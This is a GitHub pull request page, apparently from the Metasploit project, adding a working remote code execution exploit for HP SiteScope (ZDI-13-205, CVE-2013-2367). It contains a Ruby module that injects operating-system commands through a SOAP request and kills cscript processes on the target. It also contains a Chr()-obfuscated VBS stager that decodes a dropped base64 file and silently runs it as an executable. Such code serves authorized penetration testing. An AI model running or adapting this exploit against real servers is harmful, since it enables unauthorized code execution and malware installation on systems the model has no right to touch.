-
Notifications
You must be signed in to change notification settings - Fork 13.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Exploit for ZDI-13-205 #2327
Merged
Merged
Exploit for ZDI-13-205 #2327
Changes from all commits
Commits
Show all changes
8 commits
Select commit
Hold shift + click to select a range
94125a4
Add module for ZDI-13-205
34b3ee5
Update ranking and description
b6245ee
Update target info
6b1d754
Refactor, avoid duplicate code
3681955
Use Msf::Config.data_directory
5c06a47
Get the call result
34b4995
Merge for retab
7d4bf0c
Retab changes for PR #2327
File filter
Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,49 @@ | ||
echo Dim encodedFile, decodedFile, scriptingFS, scriptShell, emptyString, tempString, Base64Chars, tempDir >>decode_stub | ||
echo encodedFile = Chr(92)+CHRENCFILE >>decode_stub | ||
echo decodedFile = Chr(92)+CHRDECFILE >>decode_stub | ||
echo scriptingFS = Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(79)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116) >>decode_stub | ||
echo scriptShell = Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(83)+Chr(104)+Chr(101)+Chr(108)+Chr(108) >>decode_stub | ||
echo emptyString = Chr(84)+Chr(104)+Chr(101)+Chr(32)+Chr(102)+Chr(105)+Chr(108)+Chr(101)+Chr(32)+Chr(105)+Chr(115)+Chr(32)+Chr(101)+Chr(109)+Chr(112)+Chr(116)+Chr(121)+Chr(46)>>decode_stub | ||
echo tempString = Chr(37)+Chr(84)+Chr(69)+Chr(77)+Chr(80)+Chr(37) >>decode_stub | ||
echo Base64Chars = Chr(65)+Chr(66)+Chr(67)+Chr(68)+Chr(69)+Chr(70)+Chr(71)+Chr(72)+Chr(73)+Chr(74)+Chr(75)+Chr(76)+Chr(77)+Chr(78)+Chr(79)+Chr(80)+Chr(81)+Chr(82)+Chr(83)+Chr(84)+Chr(85)+Chr(86)+Chr(87)+Chr(88)+Chr(89)+Chr(90)+Chr(97)+Chr(98)+Chr(99)+Chr(100)+Chr(101)+Chr(102)+Chr(103)+Chr(104)+Chr(105)+Chr(106)+Chr(107)+Chr(108)+Chr(109)+Chr(110)+Chr(111)+Chr(112)+Chr(113)+Chr(114)+Chr(115)+Chr(116)+Chr(117)+Chr(118)+Chr(119)+Chr(120)+Chr(121)+Chr(122)+Chr(48)+Chr(49)+Chr(50)+Chr(51)+Chr(52)+Chr(53)+Chr(54)+Chr(55)+Chr(56)+Chr(57)+Chr(43)+Chr(47) >>decode_stub | ||
echo Set wshShell = CreateObject(scriptShell) >>decode_stub | ||
echo tempDir = wshShell.ExpandEnvironmentStrings(tempString) >>decode_stub | ||
echo Set fs = CreateObject(scriptingFS) >>decode_stub | ||
echo Set file = fs.GetFile(tempDir+encodedFile) >>decode_stub | ||
echo If file.Size Then >>decode_stub | ||
echo Set fd = fs.OpenTextFile(tempDir+encodedFile, 1) >>decode_stub | ||
echo data = fd.ReadAll >>decode_stub | ||
echo data = Replace(data, Chr(32)+vbCrLf, nil) >>decode_stub | ||
echo data = Replace(data, vbCrLf, nil) >>decode_stub | ||
echo data = base64_decode(data) >>decode_stub | ||
echo fd.Close >>decode_stub | ||
echo Set ofs = CreateObject(scriptingFS).OpenTextFile(tempDir+decodedFile, 2, True) >>decode_stub | ||
echo ofs.Write data >>decode_stub | ||
echo ofs.close >>decode_stub | ||
echo wshShell.run tempDir+decodedFile, 0, false >>decode_stub | ||
echo Else >>decode_stub | ||
echo Wscript.Echo emptyString >>decode_stub | ||
echo End If >>decode_stub | ||
echo Function base64_decode(byVal strIn) >>decode_stub | ||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub | ||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub | ||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub | ||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub | ||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub | ||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub | ||
echo If Not w2 Then _ >>decode_stub | ||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub | ||
echo If Not w3 Then _ >>decode_stub | ||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub | ||
echo If Not w4 Then _ >>decode_stub | ||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub | ||
echo Next >>decode_stub | ||
echo base64_decode = strOut >>decode_stub | ||
echo End Function >>decode_stub | ||
echo Function mimedecode(byVal strIn) >>decode_stub | ||
echo If Len(strIn) = 0 Then >>decode_stub | ||
echo mimedecode = -1 : Exit Function >>decode_stub | ||
echo Else >>decode_stub | ||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub | ||
echo End If >>decode_stub | ||
echo End Function >>decode_stub |
173 changes: 173 additions & 0 deletions
173
modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,173 @@ | ||
## | ||
# This file is part of the Metasploit Framework and may be subject to | ||
# redistribution and commercial restrictions. Please see the Metasploit | ||
# web site for more information on licensing and terms of use. | ||
# http://metasploit.com/ | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit3 < Msf::Exploit::Remote | ||
Rank = ManualRanking | ||
|
||
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Exploit::CmdStagerVBS | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'HP SiteScope Remote Code Execution', | ||
'Description' => %q{ | ||
This module exploits a code execution flaw in HP SiteScope. | ||
The vulnerability exists on the opcactivate.vbs script, which | ||
is reachable from the APIBSMIntegrationImpl AXIS service, and | ||
uses WScript.Shell.run() to execute cmd.exe with user provided | ||
data. Note which the opcactivate.vbs component is installed | ||
with the (optional) HP Operations Agent component. The module | ||
has been tested successfully on HP SiteScope 11.20 (with HP | ||
Operations Agent) over Windows 2003 SP2. | ||
}, | ||
'Author' => | ||
[ | ||
'rgod <rgod[at]autistici.org>', # Vulnerability discovery | ||
'juan vazquez' # Metasploit module | ||
], | ||
'License' => MSF_LICENSE, | ||
'References' => | ||
[ | ||
[ 'CVE', '2013-2367'], | ||
[ 'OSVDB', '95824' ], | ||
[ 'BID', '61506' ], | ||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-205/' ] | ||
], | ||
'Privileged' => true, | ||
'Platform' => 'win', | ||
'Arch' => ARCH_X86, | ||
'Targets' => | ||
[ | ||
[ 'HP SiteScope 11.20 (with Operations Agent) / Windows 2003 SP2', {} ] | ||
], | ||
'DefaultTarget' => 0, | ||
'DefaultOptions' => | ||
{ | ||
'DECODERSTUB' => File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_noquot") | ||
}, | ||
'DisclosureDate' => 'Jul 29 2013')) | ||
|
||
register_options( | ||
[ | ||
Opt::RPORT(8080), | ||
OptString.new('TARGETURI', [true, 'Path to SiteScope', '/SiteScope/']) | ||
], self.class) | ||
end | ||
|
||
def uri | ||
uri = normalize_uri(target_uri.path) | ||
uri << '/' if uri[-1,1] != '/' | ||
return uri | ||
end | ||
|
||
def check | ||
|
||
op = rand_text_alpha(8 + rand(10)) | ||
key = rand_text_alpha(8 + rand(10)) | ||
value = rand_text_alpha(8 + rand(10)) | ||
|
||
res = send_soap_request(op, key, value) | ||
|
||
if res and res.code == 200 and res.body =~ /runOMAgentCommandResponse/ | ||
return Exploit::CheckCode::Detected | ||
end | ||
|
||
return Exploit::CheckCode::Safe | ||
end | ||
|
||
def exploit | ||
@peer = "#{rhost}:#{rport}" | ||
|
||
print_status("#{@peer} - Delivering payload...") | ||
|
||
# The path to the injection is something like: | ||
# * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) | ||
# Empirically has been tested a 1500 value for :linemax makes it work | ||
# reliable | ||
execute_cmdstager({:linemax => 1500}) | ||
end | ||
|
||
def get_vbs_string(str) | ||
vbs_str = "" | ||
str.each_byte { |b| | ||
vbs_str << "Chr(#{b})+" | ||
} | ||
|
||
return vbs_str.chomp("+") | ||
end | ||
|
||
# Make the modifications required to the specific encoder | ||
# This exploit uses an specific encoder because quotes (") | ||
# aren't allowed when injecting commands | ||
def execute_cmdstager_begin(opts) | ||
var_decoded = @stager_instance.instance_variable_get(:@var_decoded) | ||
var_encoded = @stager_instance.instance_variable_get(:@var_encoded) | ||
decoded_file = "#{var_decoded}.exe" | ||
encoded_file = "#{var_encoded}.b64" | ||
@cmd_list.each { |command| | ||
# Because the exploit kills cscript processes to speed up and reliability | ||
command.gsub!(/cscript \/\/nologo/, "wscript //nologo") | ||
command.gsub!(/CHRENCFILE/, get_vbs_string(encoded_file)) | ||
command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file)) | ||
} | ||
end | ||
|
||
def execute_command(cmd, opts={}) | ||
# HTML Encode '&' character | ||
# taskkill allows to kill the cscript process which is triggering the | ||
# different operations performed by the OPACTIVATE command. It speeds | ||
# up exploitation and improves reliability (some processes launched can die | ||
# due to the fake activation). But this line also will kill other cscript | ||
# legit processes which could be running on the target host. Because of it | ||
# the exploit has a Manual ranking | ||
command = ""127.0.0.1 && " | ||
command << cmd.gsub(/&/, "&") | ||
command << " && taskkill /F /IM cscript.exe "" | ||
|
||
res = send_soap_request("OPCACTIVATE", "omHost", command) | ||
|
||
if res.nil? or res.code != 200 or res.body !~ /runOMAgentCommandResponse/ | ||
fail_with(Failure::Unknown, "#{@peer} - Unexpected response, aborting...") | ||
end | ||
|
||
end | ||
|
||
def send_soap_request(op, key, value) | ||
data = "<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" " | ||
data << "xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:api=\"http://Api.freshtech.COM\">" | ||
data << "<soapenv:Header/>" | ||
data << "<soapenv:Body>" | ||
data << "<api:runOMAgentCommand soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" | ||
data << "<in0 xsi:type=\"x-:Map\" xmlns:x-=\"http://xml.apache.org/xml-soap\">" | ||
data << "<item xsi:type=\"x-:mapItem\">" | ||
data << "<key xsi:type=\"xsd:string\">#{key}</key>" | ||
data << "<value xsi:type=\"xsd:string\">#{value}</value>" | ||
data << "</item>" | ||
data << "</in0>" | ||
data << "<in1 xsi:type=\"xsd:string\">#{op}</in1>" | ||
data << "</api:runOMAgentCommand>" | ||
data << "</soapenv:Body>" | ||
data << "</soapenv:Envelope>" | ||
|
||
res = send_request_cgi({ | ||
'uri' => normalize_uri(uri, 'services', 'APIBSMIntegrationImpl'), | ||
'method' => 'POST', | ||
'ctype' => 'text/xml; charset=UTF-8', | ||
'data' => data, | ||
'headers' => { | ||
'SOAPAction' => '""' | ||
} | ||
}) | ||
|
||
return res | ||
end | ||
|
||
end |
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
👍 avoiding quotes